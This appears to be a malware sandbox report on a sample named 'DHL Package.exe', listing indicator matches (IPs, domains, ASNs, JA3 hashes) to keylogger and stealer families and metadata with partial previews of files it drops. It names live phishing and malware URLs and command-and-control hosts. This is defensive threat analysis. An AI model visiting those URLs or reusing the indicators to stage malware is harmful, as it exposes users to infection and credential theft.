
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, UserOOBEBroker.exe, WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com
Execution Graph export aborted for target DHL Package.exe, PID 4252 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	172301400953754d8492a9b0fc0b395ef62c8f93b9f3124709dbe7c9b8d65265071a8c7140875.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse
	Arrival_Notice_10008616062024.js	Get hash	malicious	AgentTesla	Browse
	Payment Advice - Advice Ref[A26bxFeVaGBy].bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	cYl7JWax8x.exe	Get hash	malicious	Keyzetsu Clipper	Browse
	JkHAUqMrbF.exe	Get hash	malicious	DCRat	Browse
	SecuriteInfo.com.Variant.Fragtor.599953.20231.7803.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
172.93.120.113	https://jtbtigers.com/bbyyt	Get hash	malicious	Unknown	Browse
172.93.120.113	https://jtbtigers.com/bbyyt	Get hash	malicious	Unknown	Browse
172.67.177.134	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	z65PurchaseOrderNo_0072024_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	rSWIFT.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Revised PI_2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	z46PEDIDODECOMPRAURGENTE___F__D__P___.exe	Get hash	malicious	Snake Keylogger	Browse
	z13FAT9654578987.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	GF87654000.BAT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	NOVO_PEDIDO_DE_COMPRA_____pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	e-dekont.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	U prilogu je nova lista narudzbi.exe	Get hash	malicious	Snake Keylogger	Browse
132.226.247.73	Payment Advice - Advice Ref[A26bxFeVaGBy].bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Proforma.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Import Details.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Import Details.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Invoice.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Exploit.CVE-2017-0199.04.Gen.20726.10183.xlsx	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win64.RATX-gen.14927.11050.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	IMG-5067730.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	EG240711 EG240712.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Payment Advice - Advice Ref[A26bxFeVaGBy].bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	INVOICE-..js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
api.telegram.org	172301400953754d8492a9b0fc0b395ef62c8f93b9f3124709dbe7c9b8d65265071a8c7140875.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Arrival_Notice_10008616062024.js	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Payment Advice - Advice Ref[A26bxFeVaGBy].bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	cYl7JWax8x.exe	Get hash	malicious	Keyzetsu Clipper	Browse	149.154.167.220
	JkHAUqMrbF.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	SecuriteInfo.com.Variant.Fragtor.599953.20231.7803.exe	Get hash	malicious	DarkGate, MailPassView	Browse	149.154.167.220
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
reallyfreegeoip.org	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Payment Advice - Advice Ref[A26bxFeVaGBy].bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	INVOICE-..js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	purchase order.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	172301400953754d8492a9b0fc0b395ef62c8f93b9f3124709dbe7c9b8d65265071a8c7140875.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Arrival_Notice_10008616062024.js	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Payment Advice - Advice Ref[A26bxFeVaGBy].bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	cYl7JWax8x.exe	Get hash	malicious	Keyzetsu Clipper	Browse	149.154.167.220
	JkHAUqMrbF.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	http://petrnovakinvestor.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	SecuriteInfo.com.Variant.Fragtor.599953.20231.7803.exe	Get hash	malicious	DarkGate, MailPassView	Browse	149.154.167.220
	https://viral-video.live/malaysia-lucah-viral1/	Get hash	malicious	Unknown	Browse	149.154.167.99
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
HOST4GEEKS-LLCUS	Setup.exe	Get hash	malicious	AsyncRAT, HTMLPhisher, Clipboard Hijacker, Phorpiex, PureLog Stealer, Raccoon Stealer v2, RedLine	Browse	172.93.120.134
	ZYRWFLfnV1.exe	Get hash	malicious	GuLoader	Browse	172.93.120.134
	PinnacesMax.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.93.120.134
	https://jtbtigers.com/bbyyt	Get hash	malicious	Unknown	Browse	172.93.120.113
	https://jtbtigers.com/bbyyt	Get hash	malicious	Unknown	Browse	172.93.120.113
	https://hr.economictimes.indiatimes.com/etl.php?url=https://nyevinduer.info/energy/enegyy//rsvbwxpk7ggwg///YWNoaW0uaGFnZXJAYmVuZW8uY29t	Get hash	malicious	Unknown	Browse	172.93.120.138
	https://68536.org/greenssl/FGHDHDGDG/anJvc3NAdGljdG9jLmN	Get hash	malicious	HTMLPhisher	Browse	172.93.120.138
	https://burningfram.org	Get hash	malicious	HTMLPhisher	Browse	172.93.120.138
	Contract 2024-2.pdf	Get hash	malicious	HTMLPhisher	Browse	172.93.120.138
	https://lttmkhhbb.cc.rs6.net/tn.jsp?f=001peNoEiFomrvPyFSm9AwswdnZtdPTnSepTGfijDN7uMcehitgUcG0yPQc2tNQfUWahwBugDj4g3LAt2v2ze-0hLKbTARhVxML2ZXjp4PLsR49sd6yGcIwaXVhhumG34jWaoQCtW1Rrb8vZxP2u_F0RC1bQ_7q_aS239S0gkNbOQ4=&c=eKsDIk5c79XQ7GKLeCfKrMuHE__ztGIphh7Qza9Y5HuFT1cRcmh7Vg==&ch=6bP2Cw-k4S8-kwQkGr3B8l_iJnNS9DEJQRncRc9B06hrd0K6vV-67Q==	Get hash	malicious	Phisher	Browse	172.93.120.13
CLOUDFLARENETUS	https://24kjeans.com/5d9b8-7e8d4-0318b-e2566-1f7d4-f3581-c45d9-b8.php	Get hash	malicious	Unknown	Browse	104.17.25.14
	INVOICE.exe	Get hash	malicious	GuLoader	Browse	104.26.12.205
	NGL1Of0ZkJ.hta	Get hash	malicious	Cobalt Strike, AgentTesla	Browse	172.67.74.152
	BCI_Order -#090 6017.js	Get hash	malicious	FormBook	Browse	172.66.40.229
	RFQ-0122-07-2024.xls	Get hash	malicious	FormBook	Browse	172.67.162.208
	Quotation.xls	Get hash	malicious	Remcos	Browse	172.67.162.208
	FySc2FzpA8.exe	Get hash	malicious	Go Injector	Browse	162.159.135.233
	DHL Express Shipping DOC.xls	Get hash	malicious	Remcos	Browse	104.21.90.242
	Swissquote Open Benefits Enrollment.pdf	Get hash	malicious	Unknown	Browse	104.18.95.41
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
UTMEMUS	Payment Advice - Advice Ref[A26bxFeVaGBy].bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	INVOICE-..js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	purchase order.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Dw8DmNycf5.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	FedEx AWB# 777727755046.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Proforma.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Payment Advice - Advice Ref[A26bxFeVaGBy].bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	INVOICE-..js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	purchase order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e	172301400953754d8492a9b0fc0b395ef62c8f93b9f3124709dbe7c9b8d65265071a8c7140875.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	INVOICE.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	NGL1Of0ZkJ.hta	Get hash	malicious	Cobalt Strike, AgentTesla	Browse	149.154.167.220
	BCI_Order -#090 6017.js	Get hash	malicious	FormBook	Browse	149.154.167.220
	doc_1000050408072024.js	Get hash	malicious	Remcos	Browse	149.154.167.220
	SLIM00260423 LIM-AMS-BOM.js	Get hash	malicious	Remcos	Browse	149.154.167.220
	ORDER8834759934PO.vbs	Get hash	malicious	AveMaria	Browse	149.154.167.220
	Offertopurchase.js	Get hash	malicious	StormKitty, XWorm	Browse	149.154.167.220
	Offertopurchase.js	Get hash	malicious	StormKitty, XWorm	Browse	149.154.167.220
	Arrival_Notice_10008616062024.js	Get hash	malicious	AgentTesla	Browse	149.154.167.220

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll	IMG_TENTATIVE_AUDIT_PLAN.exe	Get hash	malicious	GuLoader	Browse
	IMG_TENTATIVE_AUDIT_PLAN.exe	Get hash	malicious	Unknown	Browse
	INVOICE.exe	Get hash	malicious	GuLoader	Browse
	INVOICE.exe	Get hash	malicious	GuLoader	Browse
	E-dekont.exe	Get hash	malicious	GuLoader	Browse
	E-dekont.exe	Get hash	malicious	GuLoader	Browse
	E-dekont.exe	Get hash	malicious	GuLoader	Browse
	E-dekont.exe	Get hash	malicious	GuLoader	Browse
	7Pqym5wyq5.exe	Get hash	malicious	GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\LangDLL.dll	IMG_TENTATIVE_AUDIT_PLAN.exe	Get hash	malicious	GuLoader	Browse
	IMG_TENTATIVE_AUDIT_PLAN.exe	Get hash	malicious	Unknown	Browse
	INVOICE.exe	Get hash	malicious	GuLoader	Browse
	INVOICE.exe	Get hash	malicious	GuLoader	Browse
	ORS51123MQ90EI.exe	Get hash	malicious	FormBook, GuLoader	Browse
	FACTURA_N.#U00ba_230393.exe	Get hash	malicious	GuLoader	Browse
	ORS51123MQ90EI.exe	Get hash	malicious	GuLoader	Browse
	FACTURA_N.#U00ba_230393.exe	Get hash	malicious	GuLoader	Browse
	YsNgCQIfU5.exe	Get hash	malicious	Remcos, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\LangDLL.dll

Download File

Process:	C:\Users\user\Desktop\DHL Package.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	3.8169285349163573
Encrypted:	false
SSDEEP:	48:S46+/1TKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mLofjLl:zHuPbOBtWZBV8jAWiAJCdv2CmeL
MD5:	08DE81A4584F5201086F57A7A93ED83B
SHA1:	266A6ECC8FB7DCA115E6915CD75E2595816841A8
SHA-256:	4883CD4231744BE2DCA4433EF62824B7957A3C16BE54F8526270402D9413EBE6
SHA-512:	B72E7CEA5CE1F4DC64E65A1F683A3EF9E3FA2DC45CF421F569EB461F1FDCC0CAF4FF62A872E62B400579F567C6FF9FC3C2E6E020CDCA89D96015502C803A09B9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: IMG_TENTATIVE_AUDIT_PLAN.exe, Detection: malicious, Browse Filename: IMG_TENTATIVE_AUDIT_PLAN.exe, Detection: malicious, Browse Filename: INVOICE.exe, Detection: malicious, Browse Filename: INVOICE.exe, Detection: malicious, Browse Filename: ORS51123MQ90EI.exe, Detection: malicious, Browse Filename: FACTURA_N.#U00ba_230393.exe, Detection: malicious, Browse Filename: ORS51123MQ90EI.exe, Detection: malicious, Browse Filename: FACTURA_N.#U00ba_230393.exe, Detection: malicious, Browse Filename: YsNgCQIfU5.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L......`...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\DHL Package.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.737556724687435
Encrypted:	false
SSDEEP:	192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
MD5:	6E55A6E7C3FDBD244042EB15CB1EC739
SHA1:	070EA80E2192ABC42F358D47B276990B5FA285A9
SHA-256:	ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
SHA-512:	2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Joe Sandbox View:	Filename: IMG_TENTATIVE_AUDIT_PLAN.exe, Detection: malicious, Browse Filename: IMG_TENTATIVE_AUDIT_PLAN.exe, Detection: malicious, Browse Filename: INVOICE.exe, Detection: malicious, Browse Filename: INVOICE.exe, Detection: malicious, Browse Filename: E-dekont.exe, Detection: malicious, Browse Filename: E-dekont.exe, Detection: malicious, Browse Filename: E-dekont.exe, Detection: malicious, Browse Filename: E-dekont.exe, Detection: malicious, Browse Filename: 7Pqym5wyq5.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...X..`...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.....................@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\Contingency.Lac

Download File

Process:	C:\Users\user\Desktop\DHL Package.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	126132
Entropy (8bit):	2.658680311091148
Encrypted:	false
SSDEEP:	1536:MlbLioXVkO3amxyRZDPr3gYHCYziiokEssHiSgArajhrhQ5Mdx7GzZ+PoepT08MQ:CNxgjCv2j9z5
MD5:	5C5143B5645D2A79E511CA320DFC197D
SHA1:	7C467C96D134253BDB446EBC3733828019CADAE5
SHA-256:	B3EBA2DE4B3F13CC40D995DAB16EEB569BD01CC7686D92D69C4EE6AEAB179B37
SHA-512:	F84C9826DFE5327050466CBB2F7A377754709CFB81442EE358FB3C3A4D880B39634305E25F491494964E0907A8C8E3507C975E933E4A1C9519DB0ED0618D3BB1
Malicious:	false
Reputation:	low
Preview:	000000000000000000006A6A000000000000004C00F400C4C4C4C400DCDC0000005200009200F60000009D9D9D9D000000000003030096960000D4002828280000B5B5B5B5B5B500D0D0D0D0D000BF002020000086868600780000005555555555555555008383007E00A800D600D9D9D90000A6A600D30000D8D8000000A1A1A1A100C9009292920000002E2E00000000003B00000000001C00004C00000059008F8F8F8F8F0026260000DD0000C1000000D4D4D400BBBB0000000000000000002500BC0000CC000000A7002C00000000929200DCDCDC004141000000009292929200DB0000DFDFDF00A8000000004141410000000000001B00000000FCFCFC00003B00009E000C0C0C00A20000C5C5009900450000170000E4004B00000000000007000000BFBF000000F3F30000000000F9006E000000D4D400008E8E007C000021000000000051000071006969696969000000A4A400210000F300006200E500EB00DC0074000000A7000000BA00464646464600B8B8006C0084004C4C0000008C0000000000E4E4000B00A800212121212121005252000000F5F5F5F5002F2F2F0000000000313100D30000F2F20000890000000E0E00000D0000C4C4C4C4000000F400000000FDFDFDFDFDFD00000000DFDF002900007800C5C5000023230000D6D6D6D6D6D60033000000A40000003600

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\Opspring.dia

Download File

Process:	C:\Users\user\Desktop\DHL Package.exe
File Type:	data
Category:	dropped
Size (bytes):	8527
Entropy (8bit):	4.95804877248915
Encrypted:	false
SSDEEP:	192:MVenofP5CL1Vkht0EjXViZ/jjRI6CUwHC6dqSAzZ+PHPwEc2VO:9s5CLwIaXkZLjMrC2EZ+PvwX
MD5:	82A269F5BAE8475EACD0E5CF4C7FA6DB
SHA1:	E50AA449BFEAB5C72EB98BF0F98D16C7B5846E23
SHA-256:	BD2421D6C1B53D016F7C61004BFA7640A36A25686D29D87372D736E241AD5314
SHA-512:	896244A0C5819E2D4979529797FAB0B801FE4CA13DBF7039531ED157B8C4F55C512447878C5CC764FC78C1D01300894C038996D31CE66099DEB930CFAA730A8B
Malicious:	false
Reputation:	low
Preview:	...H.;..v........L.)v...I.......n5Av....%...........Jg..K............).z......B..2.......\.....[:.........&.......\.........."................/....R...G..u~.\..u......C.............?.f.}...........z]............3..........\|...._L..............v....e.........X......J.c....^b.....U.c...m......r.....0e._w...,.$.......B.......k.'...m.........%L...N...........I.....N........,.Hl.....@.~.......u....'.(..........>.......]..(w..[........d..n..v..$......M.....\|............,......16+...T..{r..#.......'........9........V........u.v....Zm........T.Z..Z.....qk.r4...........j.....l......&B.d......./...&#'.......r..~..o1.a.e.p................<......2~.pE..K...l..H.........h..Q.u............. ...........F...........o.p..............{.........a.Pm.m.0...............q......?......z.............G.g.............T.....0....[.....(....i.r.=^.........I.....j.........~K.......e9....G..H.........p......................x.p.......&.....6......%e.E........<.n..@......U............4.......K........

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\Overfamiliarly.lit

Download File

Process:	C:\Users\user\Desktop\DHL Package.exe
File Type:	data
Category:	dropped
Size (bytes):	1892
Entropy (8bit):	4.8587730695831475
Encrypted:	false
SSDEEP:	48:PO0abdHVY7V/JaLI57SrGchj45PxgrHS/r/:m2zacoGlgy/r/
MD5:	19AD849311A96A6E4CF732F801E4E82F
SHA1:	097A4D680E6EC048650497BF0A5DE57045435AC2
SHA-256:	4336F9F5F28E007E6A48A5B2078D04FCBFABDDF8FA91C7A1A1496965459600F2
SHA-512:	4B454937708F04506E2444434B005BADD21CC7D901D72CD3DDFBB97E74C617D1A6558613C2BA6921C3C3C8818F920D6D635F82CA4A7037B37D87192FD45EE0B3
Malicious:	false
Reputation:	low
Preview:	.C.]...z.^.......[...........h....$.........;..k.....!.....$9..4....................W.....(....%..b..>......6.....<..).B..........W#..........4kq.........>e...!.........0.......\|..o.............F.......9...............!..m..X.....4..!.R.....B.>.....4....v9......B....\|..b........y..,.2x.....h....M..............".........~...........F..].^....`N....7..........E...ad........Q...........g....`.........M..^......X...j6W......D+.V;=...<...........v.!.........-@....../......L....P...........v...G. ,DwM.................~...........#.......i........n...9.u......&........R......Z..._c.......E..1K....&.f.......Y.....j.......s..........Q........}.....{.........x..9...Q.B.........Y.......5........~..........!.......e....s...W.....J.....<.l.........\|.................#.........b..........+8.R......e......@..i..].................B.........a...........I........&/...........-................G...d......8.........-!..=...........i.P........M...............:..BX$L.~............k.,.........

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\Spagfrdigst.Swe

Download File

Process:	C:\Users\user\Desktop\DHL Package.exe
File Type:	data
Category:	dropped
Size (bytes):	304993
Entropy (8bit):	7.546930618292059
Encrypted:	false
SSDEEP:	6144:eP/sbGOI2diW/y+SA/Cl1J0DjQ/FO7wKlOp6E:eP/sbDu+Si0ajQ/FZqWx
MD5:	12606107850FA107F826AC1714E3462F
SHA1:	7D8585FEEF4409360EE59884B8C73136E94651B2
SHA-256:	208F07CF709CB23D3417577A82816909D9401975613129C73D9D0335159FAE21
SHA-512:	3D8327147C7F6A89CBF5D0BBD1464D2417311DBF865E3749C7019265D84618B8587AB36BD03654DE2DF5610EAB3117E70722E8D40F90DDA595E32A4C8DC16B1F
Malicious:	false
Preview:	...E...............+++....................V..;;;;;.Y............E..................999......----.........ww.............................>........>..W........mm.v..............1...E...-.XXX.......33......qqq....8......................[[.A.f..w.sss.D..........................5..VV..../..!..........................................................DD.......................v...............\\......``..%%.......FF...[.lll..........................................q......u....R..gggg.............uu.............LLL.C.........``..............jj.U.p.....ii......#.....D....................H..................B.SSSS....H........nnnn........................qqq.............c...FF........++.::...$.........YY.dd.....&.l.............................=...........__.....@@@........fff.....%.....0.6.q.}...s..............4........7.......}}.......*..."""""""""""""....""......ZZZ......\|\|...........T...........H.............................====..66.....A............X.............e....9......=====..``........Z....

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\cuddled.txt

Download File

Process:	C:\Users\user\Desktop\DHL Package.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	469
Entropy (8bit):	4.25836143372715
Encrypted:	false
SSDEEP:	12:SqmZZmYO+JMI95DvGK9yfxLXILabVNUXUSb8ztLy:zmXlMc5DeK9ypL4LahCXP8Be
MD5:	3483FAB1A78F10E7784CA3CA3150B2CA
SHA1:	FE5E671A0A0D3B278BEF62E29D3BC95A6B842B82
SHA-256:	17931D5FA3F3E93FE13344DE61E8239D41A1B7B603493F07AA5A04D131557592
SHA-512:	EC6D70B3F03DFD8AE89112E66A07847597D7D1D3B6A508FB396DDF0B7E69FF6109EA1929DD904D5FE6B7DC41FE79D599E05E3869483838416F95A0ADB663D670
Malicious:	false
Preview:	naturkraft dataenes marilene diplasiasmus raadgivet stilleleges transpirerer levnenes unestimably..mudded nuking elektroencefalografien frstegangsbrugeres kontraktionernes minesweepers.lysines sundries excitonic propretorial rehinge,besejringens quadricycle puppes udbulning flagmen varsity daggy muddledness droskechauffrers..saarbart kistetrs adonisers herniotomist toivel,trull spilfgteri reseal clipsheet papirsk silentium stockholmers undersea usedly afstikkerne..

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\nsec.tar

Download File

Process:	C:\Users\user\Desktop\DHL Package.exe
File Type:	Matlab v4 mat-file (little endian) \322\031\226, numeric, rows 16515260, columns 27513
Category:	dropped
Size (bytes):	6387
Entropy (8bit):	4.886287732164337
Encrypted:	false
SSDEEP:	96:YPAr4BCbpOje1kysgOM27luhZl9ubZmlRe9zKOfTKeDxy8nO433trIO8syU+B8:Y4rSje1FI85uU78hTTDUB433tkGCu
MD5:	39DCABFD6C10C19CC2D532B2C03E57EA
SHA1:	1B2813C18FF9F2F6344704133E579A70D623F0E2
SHA-256:	8F73AB5E525B86591B138F15FD4315876F07F0222683711D84A56966C5901A9F
SHA-512:	2C63BDDE2FCC891FDB41FC45D46DAD3083828512704533E427FFC1D1C8A04140BE96BFBFA6D4277B9EE2AD73983350452526583C38D0A2EFE1631413F8E1EB26
Malicious:	false
